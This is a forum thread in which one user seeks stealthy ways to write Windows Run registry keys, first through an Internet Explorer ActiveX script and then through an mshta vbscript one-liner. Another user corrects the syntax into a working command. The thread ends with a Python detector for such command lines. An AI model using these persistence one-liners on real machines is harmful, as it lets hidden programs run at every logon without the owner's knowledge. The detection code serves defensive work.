-
hacxx
- Posts: 57
- Joined: 09 Apr 2015 13:18
#1
by hacxx » 20 Sep 2020 18:19
I have had this code for years that basically takes advantage of Internet Explorer to prompt the user if they want to execute an ActiveX Object. This Object stealthily writes registry keys to the system.
Code:
<script> var exec = 'calc.exe'; var Shell = new ActiveXObject('WScript.Shell'); Shell.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\calc',exec); </script>
More about the script here
http://raidcommunity.forumup.it/viewtop ... mmunity#70
Yesterday, while reviewing this forum, I got the idea to improve the code above and convert it to an mshta command line to be executed in cmd.exe. Basically, what I was looking for is a way to write registry keys without using reg add and bypassing any Windows limited rule.
Here is the code that i wrote but it doesn't work. Can anyone spot the error?
Code:
mshta vbscript:(CreateObject("WScript.Shell").RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\calc","calc.exe"))(Window.Close)
Thanks
-
aGerman
- Expert
- Posts: 4678
- Joined: 22 Jan 2010 18:01
- Location: Germany
#2
by aGerman » 21 Sep 2020 11:07
At least you have to escape the comma with a caret because it's a separator for arguments in a command line. And I'm pretty sure the double backslashes are wrong in the VBS syntax. I haven't tested though.
Steffen
-
#3
by hacxx » 21 Sep 2020 12:27
The double backslash works in the original code, that's why I was using them. Can you provide a sample after you test it out?
Thanks
-
#4
by aGerman » 21 Sep 2020 13:36
hacxx wrote: "The double backslash works in the original code"
The original code is JScript. Your recent code is VBScript. They are not the same thing.
hacxx wrote: "Can you provide a sample ..."
What was wrong with my explanation?
Code:
mshta vbscript:(CreateObject("WScript.Shell").RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\calc"^,"calc.exe"))(Window.Close)
hacxx wrote: "... after you test it out."
Testing is your task.
Steffen
-
#6
by aGerman » 22 Sep 2020 12:13
hacxx wrote: 22 Sep 2020 04:44
After initial testing, it didn't work. Syntax error on Char 99.
After reviewing the code I tested again and I spotted the error you left on purpose
Tested now and it works out of the box in a cmd shell as well as in a batch file.
FWIW, no idea what this should even be good for. A simple REG ADD would have done the job for you, but ... never mind.
Steffen
-
#8
by aGerman » 17 Jul 2021 17:21
Registry keys which require elevation can't be updated without admin privileges.
Steffen
(Stop promoting your site in each and every post! Otherwise, I'll ban your account.)
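A detection-side view of the commands in this thread, as an added example that is not part of the original posts: the Python sketch below flags process command lines where mshta runs an inline vbscript:/javascript: handler and calls RegWrite on a Run key, after undoing the cmd.exe caret escaping discussed in post #4. The function names, severity labels and the sample lines other than the thread's two commands are assumptions made for illustration.

```python
import re

# mshta given an inline script-protocol handler instead of an .hta file path.
INLINE_SCRIPT = re.compile(r"\bmshta(?:\.exe)?\b.*?\b(vbscript|javascript):", re.I)
REGWRITE = re.compile(r"\.RegWrite\s*\(", re.I)
# Autorun keys; \\+ accepts both the single and the doubled backslash spelling.
RUN_KEY = re.compile(
    r"\b(HKCU|HKLM|HKEY_CURRENT_USER|HKEY_LOCAL_MACHINE)\\+Software\\+Microsoft\\+"
    r"Windows\\+CurrentVersion\\+(Run|RunOnce)\b", re.I)


def normalize(cmdline):
    """Undo cmd.exe caret escaping outside double quotes, so '^,' matches ','."""
    out, in_quotes, i = [], False, 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == '"':
            in_quotes = not in_quotes
        elif ch == "^" and not in_quotes and i + 1 < len(cmdline):
            i += 1                # drop the caret, keep the escaped character
            ch = cmdline[i]
        out.append(ch)
        i += 1
    return "".join(out)


def classify(cmdline):
    """Return the script handler mshta was given and a severity label."""
    text = normalize(cmdline)
    handler = INLINE_SCRIPT.search(text)
    if not handler:
        return {"handler": None, "severity": "none"}
    persists = bool(REGWRITE.search(text) and RUN_KEY.search(text))
    return {"handler": handler.group(1).lower(),
            "severity": "high" if persists else "medium"}


# Constructed process-creation command lines; the first two reuse the thread's commands.
SAMPLES = [
    r'cmd.exe /c mshta vbscript:(CreateObject("WScript.Shell").RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\calc"^,"calc.exe"))(Window.Close)',
    r'mshta vbscript:(CreateObject("WScript.Shell").RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\calc","calc.exe"))(Window.Close)',
    r'mshta javascript:close()',
    r'mshta.exe C:\Tools\inventory.hta',
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(classify(sample)["severity"], "|", sample[:60])
```

The caret only appears in the parent cmd.exe command line; the mshta process itself is logged with the caret already removed, so both forms need to match.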